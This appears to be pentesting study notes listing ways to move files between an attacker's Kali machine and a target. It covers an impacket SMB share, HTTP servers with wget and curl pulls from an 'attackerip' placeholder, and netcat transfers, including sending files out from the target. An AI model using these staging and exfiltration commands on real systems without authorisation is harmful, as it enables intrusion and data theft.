On windows pc
copy \\192.168.1.1\kali\f1.py  # 192.168.1.1-ip_linux_box; kali-sharename; f1.py-file

On linux pc
python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .  # kali is sharename name; . is our local direcoty; also place your file in the current directoty where . is
python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali1 $(pwd) -user zaza -password zaza

----------------------------------------------------------
#With this tool we copy a file from windows to linux
#PSCP tools from putty-tools package
pscp user@target_ip:/path_to_file /path_where_to_save


Python SimpleHTTPServer

#on Attacker
python -m SimpleHTTPServer

#on target
wget <attackerip>:8000/filename


------------------------------

Apache

#on Attacker
cp filetosend.txt /var/www/html
service apache2 start

#on target
wget http://attackerip/file
curl http://attackerip/file > file
curl http://attackerip/file -o file
fetch http://attackerip/file        # on BSD

----------------------------------

Netcat (From Target to Kali)

# Listen on Kali
nc -lvp 4444 > file

# Send from Target machine
nc <kali_ip> 4444 < file

-----------------


Netcat (From Kali to Target)

# on target, wait for the file
nc -nvlp 55555 > file

# on kali, push the file
nc $victimip 55555 < file


----------------------

Extra:
To send the executable file to your machine:

base64 executable
# copy the output
# paste it in a file called file.txt
# decode it and create the executable
base64 -d file.txt > executable




